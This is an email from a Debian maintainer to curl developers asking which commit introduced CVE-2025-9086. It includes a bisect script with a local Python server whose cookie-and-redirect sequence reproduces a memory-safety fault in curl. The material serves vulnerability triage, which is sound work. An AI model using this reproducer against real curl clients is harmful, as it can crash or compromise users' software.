Hello curl friends,

I was investigating CVE-2025-9086 for Debian, trying to run the POC against our
older releases together with Alex and could not run it against 7.88.1, even
though it was supposedly introduced in 7.31.0 as per
https://curl.se/docs/CVE-2025-9086.html.

Running a git bisect on the upstream project [0], I've landed on the following
commit as introducing the ASAN failure:
https://github.com/curl/curl/commit/1aea05a6c2699e80c75936d58569851555acd603

I understand not triggering the ASAN finding doesn't necessarily mean the
issue didn't exist, so I wanted to ask for upstream help here: do you believe
that could be the correct breaking commit, rather than
https://github.com/curl/curl/commit/f24dc09d209a2f91ca38d?

I'm cc'ing Alex, who backported the fix for Debian and who noticed the POC
didn't run for our older releases, and also Charles, who helped us release an
advisory for one of the older Debian releases (we might have released an
advisory which wasn't needed).

The bisect script I used is at the bottom of this email [0], but note that in
order to run it, you will need to map your hostname to 127.0.0.1 in /etc/hosts
if it's not already there.

Cheers,

[0]
```bash
#!/bin/bash

# Exit code 125 tells "git bisect run" that this revision cannot be tested
# (build or configure failure) and should be skipped.
untestable() {
    git_clean
    exit 125
}

# Exit code 1 marks the revision as "bad" (ASAN reported the failure).
fail() {
    git_clean
    exit 1
}

# Restore the tree so the next bisect step starts from a clean checkout.
git_clean() {
    git reset --hard
    git clean -d -x -f > /dev/null
    set +x
}

set -x

autoreconf -i

# Quote the multi-flag values; unquoted, "export" would try to export "-g",
# "-fno-omit-frame-pointer" and "-O1" as separate (invalid) variable names.
export CFLAGS="-fsanitize=address -g -fno-omit-frame-pointer -O1"
export LDFLAGS="-fsanitize=address"
export LIBS="-lasan"

./configure --with-nghttp2 \
  --with-openssl \
  --with-ca-path=/etc/ssl/certs \
  --with-ca-bundle=/etc/ssl/certs/ca-certificates.crt \
  --prefix $HOME/curl/install \
  --includedir=/usr/include/x86_64-linux-gnu \
  || untestable

make -j || untestable

# Self-signed certificate for the local HTTPS server (curl is run with --insecure).
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 1 \
  -nodes -subj "/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"

# Quoted delimiter: the Python source is written verbatim, with no shell expansion.
cat << 'EOF' > server.py
#! /usr/bin/python3

from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
import ssl
import threading
import time

class HTTPSRequestHandler(BaseHTTPRequestHandler):
  def do_GET(self):
    self.send_response(302)
    self.send_header("Set-Cookie", "A=B; path=/; Secure")
    self.send_header("Location", f"http://{socket.gethostname()}:9080")
    self.end_headers()

class HTTPRequestHandler(BaseHTTPRequestHandler):
  def do_GET(self):
    self.send_response(200)
    self.send_header("Set-Cookie", "A=C; path=/foo/")
    self.end_headers()
    self.wfile.write(b"A" * 128)

def run_https_server():
  httpd = HTTPServer(('', 9443), HTTPSRequestHandler)
  ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
  ctx.load_cert_chain(certfile='./cert.pem', keyfile="./key.pem")
  httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
  httpd.serve_forever()

def run_http_server():
  httpd = HTTPServer(('', 9080), HTTPRequestHandler)
  httpd.serve_forever()

if __name__ == "__main__":
  https_thread = threading.Thread(target=run_https_server)
  http_thread = threading.Thread(target=run_http_server)
  https_thread.start()
  http_thread.start()

  while True:
    time.sleep(1)
EOF

python3 server.py &
SERVER_PID=$!
sleep 1

# Make ASAN exit with a distinctive code so it can be told apart from curl's own exit codes.
export ASAN_OPTIONS=exitcode=42
./src/curl --insecure -c cookies -vv -L "https://${HOSTNAME}:9443"

CURL_EXIT_CODE="$?"

kill "$SERVER_PID"

echo "CURL EXIT CODE: $CURL_EXIT_CODE"
if [ "$CURL_EXIT_CODE" -eq 42 ]; then
    fail
fi

# If we got here, success.
set +x
git reset --hard
exit 0
```

-- 
Samuel Henrique <samueloph>
